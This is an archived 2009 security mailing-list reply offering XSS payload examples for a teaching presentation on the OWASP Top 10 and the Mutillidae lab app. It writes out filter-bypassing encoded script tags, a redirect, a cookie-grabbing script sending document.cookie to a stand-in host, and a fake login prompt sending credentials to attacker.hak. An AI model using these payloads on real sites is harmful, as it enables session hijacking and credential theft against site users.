Home page logo
/

pauldotcom logo PaulDotCom mailing list archives

Cool things to inject via XSS
From: trklisted at networksamurai.org (mOses)
Date: Fri, 29 May 2009 10:50:53 -0400

Adrian,

On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:

Ok, I've got yet another presentation coming up, this time on the  
OWASP Top 10 and Mutillidae. One of the things I'm going to cover is  
XSS. The canonical example of course is:

<script>alert("XSS");</script>

but that is boring, and gives folks the impression that XSS is not  
that serious.  Better short eample swoul be:



One of the more interesting challenges with web applications is the  
fact that the browser supports multi encoding types and double  
encoding entries.

Here is a SIMPLE double encode of your alert:

<script>alert('WEEEE');</script>

Hex encode the < and / tags:

%3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E

Maybe you can avoid simple filtering of a single encode filtering by  
encoding the % in the '%3C':

%253Cscript%253Ealert('WEEE');%253%252Fscript%253E

We can go further and continue to obfuscate things and bypass more and  
more filters.


Redirect traffic to your site:
<script>window.location = "http://www.irongeek.com/";</script>

A little cookie Grabbing:
<script>
new Image().src="http://some-ip/mutillidae/catch.php? 
cookie="+encodeURI(document.cookie);
</script>


In addition its also worthwhile to note that you do not even need to  
have a real running webserver on this particular http://some-ip/ 
mutillidae/

The important thing to note is what the browser is understanding here.

http://some-ip/catch.php? <- this script doesn't technically need to  
exist.

cookie='+ <--- this is the part that is telling the browser hey in the  
actual URL stream append something beyond the cookie= field.

+encodeURI(document.cookie); <- HEY in the URI field insert your  
current cookie from this current site and send it in the raw URL.

If you have a backdoor listening shell then you will get the cookie in  
a URI encoded format showing up in your listener as a RAW http request.


Or maybe a password form to make people think they have to login,  
but it just grabs the credentials:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php? 
username="+username+"&password="+password+"\">");
</script>

What are other cool thing to inject, besides maybe BeEF, that shows  
of how XSS can be a big deal?


Other uses include a distributed port scanner within javascript  
leveraging the browser and sending in a port scan and scanning the  
network that she is on.


Thanks,
Adrian

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090529/dd048a17/attachment.htm 


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault